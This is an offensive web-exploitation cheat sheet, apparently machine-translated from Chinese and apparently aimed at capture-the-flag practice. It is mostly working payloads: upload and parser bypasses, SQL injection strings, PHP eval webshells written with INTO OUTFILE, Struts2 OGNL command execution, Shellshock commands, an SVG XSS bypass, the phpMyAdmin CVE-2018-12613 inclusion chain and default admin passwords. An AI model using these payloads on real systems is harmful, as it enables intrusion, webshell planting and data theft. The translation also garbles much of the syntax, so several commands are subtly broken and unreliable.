File upload vulnerability
when php upload fails, consider white list file (change the suffix php5, PHP3)
IIS6 Parsing Vulnerability: When uploaded to the directory for /*.asp, any files that are parsed as asp, asp upload form FIG. txt horse or horses, is connected (directly connected to the connection)
SQL injection
numeric injection: No single quote
character injection: front and a comment character after single quotes, universal password 'or' 1 '=' 1 except
blind:
available tools, procedures, Burp blasting to assist
regular injection
1 and 1 = (select 1 from information_schema.tables where table_schema = 'xxx' and table_name regexp '^ us [az]' limit 0,1)
Note: all matches regular, conventional blinds limit n, 1 different, n is not need to change
the same, similar used like a regular
select () like 'ro%' user
Weak password
admin admin / admin admin888 / admin 123456 / admin domain / test test / test test123
File parsing vulnerabilities
directory resolve
/xx.asp/webshell.jpg
/xx.asa/webshell.jpg
file parsing
webshell.asp; jpg apply to IIS6
the Apache parsing vulnerability
test.php.xxx.yyy suffixes x and y are all unrecognized name
copy xx.jpg / b + yy.txt / a xy.jpg FIG Ma -> configuration sp.jpg, write <PHP fputs (fopen ( 'payload.php ', 'w'), '<php eval?? ($ _POST [hehe])> ');??>, access sp.jpg / .php suitable for Fast-CGI opening 0x02 IIS 7.0 / IIS 7.5 / Nginx version <= 8.03
/xx.jpg%00.php in Fast -CGI case is closed, Nginx <= 0.8.37
rare suffix
php aromatic phtml, pht, php3, php4, php5, pyc and Pyo
.htaccess use
.htaccess if the file can be uploaded and can cover the original configuration, the configuration file is written <FilesMatch "1"> SetHandler application / x-httpd-php </ FilesMatch>
Vesting conditions: Apache's configuration file to write: AllowOverride All
load modules mod_Rewrite, write in the Apache configuration file: LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
(Needed in Ubuntu) sudo a2enmod rewrite
using
MIME types Review: .htaccess write: AddType application / x-httpd- php
or write <FilesMatch "shell.jpg"> SetHandler application / x-httpd-php </ FilesMatch>, can be resolved to shell.jpg php
or write <FilesMatch "hello"> SetHandler application / x-httpd-php </ FilesMatch>, as long as they are interpreted as a hello comprising php
sql write the shell
. 1 'SELECT Union. 1,' <PHP the eval ($ _ the POST [A]);??> 'into outfile' into outfile /var/www/tmp/a.php'# with the written word *** php, premise: to know the absolute path to the site part of a word *** turn hex
absolute path can write into outfile when a fictional path to really broke path
bypass bypass spaces such as shielding union can be rewritten as un union ion
struct2 s2-16 loopholes
find action, and then construct the following code (to index.action, redirect command as an example, the code to perform the role of *** command and download the file to a local)
index.action redirect:? A = $ {# (new new java.lang.ProcessBuilder (new java.lang.String [] { ' ls', '\'})). start (), # b = # a.getInputStream (), # c = new java.io.InputStreamReader ( #b), # d = new java.io.BufferedReader (#c), # e = new char [50000], # d.read (#e), # matt = # context.get ( 'com.opensymphony.xwork2 .dispatcher.HttpServletResponse '), # matt.getWriter (). the println (#E), # matt.getWriter (). the flush (), # matt.getWriter (). Close ()}
new new java.lang.String [] { 'ls', '\' } *** as a command
for index.action redirect:? behind the content, there may need to be transcoded url
following code can be used echo website absolute path
index.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getSession(),#c=#b.getServletContext(),#d=#c.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#d),#matt.getWriter().flush(),#matt.getWriter().close()}
以上代码均为ONGL表达式
bash remote command execution vulnerability
looking /cgi-bin/x.cgi or directly with search engines to find cgi
exploit () {:;}; + command (with burp capture, this statement into the connection or user-agent)
command examples:
() {:;}; echo; / bin / the bash -C 'CAT /key.txt'
() {:;}; echo; / bin / LS /
echo; closed to function
svn source code leak vulnerability
/.svn/entries display web directory number
/.svn/wc.db downloadable database with database software such as SQLiteStudio open (or try to open a txt renamed notpad ++), then look for key
0day Bypass
<svg> <Script XLink: the href = Data:, Alert (. 1)> </ Script> </ svg> tag using the bypass svg
php backend file inclusion vulnerability in CVE-2018-12613
premise: Login Web
Open SQL, write the SELECT '<php phpinfo ()??>;'
Burp capture, record the cookie (phpMyAdmin = xxx)
using the file that contains the vulnerability
index.php? DB = target sql.php% 253F /../../../../../../../../../../../ tmp / Sess + cookie previously recorded
(session save directory Macos to / var / tmp /, Linux's session save directory / var / lib / php / sessions )
to find path in phpinfo, the absolute path to find the site's
example: / var / www / html /
through sql into outfile way to write the horse:
the SELECT '<PHP @eval ($ _ POST [a])??>;' INTO outfile '/var/www/html/a.php'
Injection HTTP header (X-Forwarded-for)
capture, send to the Repeater, written X-Forwarded-For: or 1 = 1
if there is an error injection
followed by a conventional injection sql (order by ... union select .. .)
struct2 s2-04 loophole
use patterns: / struts /../ directory backtracking
bypass: url encoded ..% 2f, if not back to normal explicit attempt secondary url encoded ..% 252f
Parameters submit:
? / + Parameter parameter can be submitted to the website, submission is available burp be modified
File read
example: index.php jpg = hei.jpg, rewrite index.php jpg = index.php can read the contents of index.php??
PhpStorm by the Created
PhpStorm .idea file will be automatically generated, which will contain a set of xml file